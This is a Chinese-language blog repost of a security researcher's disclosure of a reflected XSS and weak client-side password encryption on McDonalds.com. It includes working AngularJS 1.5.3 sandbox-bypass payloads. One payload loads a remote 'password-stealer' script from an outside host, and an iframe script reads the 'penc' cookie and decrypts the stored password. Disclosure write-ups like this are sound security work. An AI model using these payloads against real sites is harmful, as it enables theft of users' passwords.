阿里云-云小站(无限量代金券发放中)
【腾讯云】云服务器、云数据库、COS、CDN、短信等热卖云产品特惠抢购

重磅:利用麦当劳网站的漏洞获取用户密码

82次阅读
没有评论

共计 2374 个字符,预计需要花费 6 分钟才能阅读完成。

导读 本文讲述了利用不安全的加密存储(Insecure_Cryptographic_Storage)漏洞和服务端反射型 XSS 漏洞,实现对麦当劳网站(McDonalds.com)注册用户的密码窃取,进一步测试,还可能获取到网站注册用户的更多信息。
POC- 利用反射型 XSS 漏洞绕过 AngularJS 框架沙箱

麦当劳网站 McDonalds.com 设置有一个搜索页面,该页面存在 XSS 反射型漏洞,可以返回搜索参数值,假设搜索参数 q 为 ***********-test-reflected-test-***********,对应链接:
https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********

则执行效果如下:
重磅:利用麦当劳网站的漏洞获取用户密码

重磅:利用麦当劳网站的漏洞获取用户密码

麦当劳网站采用 AngularJS 框架,所以可以使用特殊字符在搜索区域进行返回值尝试。通过更改搜索参数 q 为 {{$id}} 之后,发现返回值对应 AngularJS 范围内的对应 ID 数字 9:

Link used: https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}

重磅:利用麦当劳网站的漏洞获取用户密码

重磅:利用麦当劳网站的漏洞获取用户密码

AngularJS 是一个流行的 JavaScript 框架,通过这个框架可以把表达式放在花括号中嵌入到页面中。例如,表达式 1 +2={{1+2}}将会得到 1 +2=3。其中括号中的表达式被执行了,这就意味着,如果服务端允许用户输入的参数中带有花括号,我们就可以用 Angular 表达式来进行 xss 攻击。

由于 AngularJS 工作在沙箱模式,所以使用参数 {{alert(1)}} 无任何返回信息,但这并不代表 AngularJS 沙箱没有漏洞。在 AngularJS1.6 版本中,由于沙箱机制不能很好地起到安全防护目的,已经被从源码中移除。而 PortSwigger 还对 AngularJS 的各版本沙箱进行了绕过测试,并给出了相应绕过执行命令。

在这里,我们来看看 McDonalds.com 使用的 AngularJS 版本,通过在浏览器控制端输入 angular.version 命令:
重磅:利用麦当劳网站的漏洞获取用户密码

可以发现 AngularJS 为 1.5.3 版本,参照 PortSwigger 的测试,我们选用

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

作为搜索参数,很惊喜,返回值如下:
重磅:利用麦当劳网站的漏洞获取用户密码

这就意味着,我们可以利用绕过命令,对网站加载外部 JS 脚本文件,如构造如下命令:

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`

重磅:利用麦当劳网站的漏洞获取用户密码

在内容安全策略(Content-Security-Policy)的提示下,第三方脚本文件被成功加载。

窃取密码

除此之外,我在麦当劳网站的注册页面发现了复选框“Remember my password”,通常来说,这只有在用户登录页面才存在,有点奇怪:

重磅:利用麦当劳网站的漏洞获取用户密码

重磅:利用麦当劳网站的漏洞获取用户密码

在该页面的源代码页面,包含了各种 passowrd 字段内容,甚至存在一个有趣的密码解密函数:
重磅:利用麦当劳网站的漏洞获取用户密码

最危险的是, 利用该解密函数代码竟然可以实现对客户端或双向加密存储的密码破解。尝试对发现的被存储 Cookie 值 penc 进行解密,竟然成功了!

重磅:利用麦当劳网站的漏洞获取用户密码

而且,经分析发现,Cookie 值 penc 的存储期限是大大的一年!LOL!

重磅:利用麦当劳网站的漏洞获取用户密码

另外,以下的源码分析显示,麦当劳网站使用了 Javascript 的 CryptoJS 加密库进行信息加密,加密方式为 3DES,其中加密参数 key 和 iv 都为通用,这意味着只需要获取到 cookie 值就能对密码解密:

重磅:利用麦当劳网站的漏洞获取用户密码

由于 AngularJS 沙箱绕过方法只对 charAt 的 join 方法(charAt=[].join;$eval(‘x=alert(1)’))有效,所以即使我曾尝试在搜索区域构造其它恶意命令对 cookie 信息进行解密,但最终总是因为 getCookie 失败而无效。只有当 charAt(0) 不为空时,getCookie 才有返回值:

重磅:利用麦当劳网站的漏洞获取用户密码

最后,我写了一段调用麦当劳网站首页框架进行 cookie 窃取的脚本,为了避免脚本因 AngularJS 沙箱被绕过而被反复执行,所以,我用 window.xssIsExecuted 对其进行了显示控制,如下:

if (!window.xssIsExecuted) {
 
    window.xssIsExecuted = true;
 
    var iframe = $('网址'>'); $('body').append(iframe); iframe.on('load', function() {var penc = iframe[0].contentWindow.getCookie('penc'); alert(iframe[0].contentWindow.decrypt(penc)); }); }

最终,配合以下 AngularJS 沙箱绕过命令,可以成功从 cookie 信息中对密码解密!

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}

重磅:利用麦当劳网站的漏洞获取用户密码

遗憾的是,我曾多次与麦当劳官方就此问题进行联系,但是他们竟然都不回应!@#%¥&!,所以我选择把此漏洞公开。

阿里云 2 核 2G 服务器 3M 带宽 61 元 1 年,有高配

腾讯云新客低至 82 元 / 年,老客户 99 元 / 年

代金券:在阿里云专用满减优惠券

正文完
星哥玩云-微信公众号
post-qrcode
 0
星锅
版权声明:本站原创文章,由 星锅 于2024-07-24发表,共计2374字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
【腾讯云】推广者专属福利,新客户无门槛领取总价值高达2860元代金券,每种代金券限量500张,先到先得。
阿里云-最新活动爆款每日限量供应
评论(没有评论)
验证码
【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中